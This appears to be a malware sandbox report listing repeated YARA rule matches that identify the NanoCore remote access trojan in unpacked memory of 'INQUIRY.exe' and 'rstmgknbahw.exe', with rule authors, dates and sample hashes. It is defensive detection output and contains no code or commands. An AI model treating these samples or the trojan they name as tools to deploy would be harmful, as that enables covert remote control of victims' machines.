Source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.INQUIRY.exe.2921548.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.INQUIRY.exe.2921548.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.INQUIRY.exe.39a98c0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.INQUIRY.exe.39a98c0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.rstmgknbahw.exe.395543d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.rstmgknbahw.exe.395543d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.INQUIRY.exe.39adee9.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.INQUIRY.exe.39adee9.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.rstmgknbahw.exe.28f68dc.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.rstmgknbahw.exe.28f68dc.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
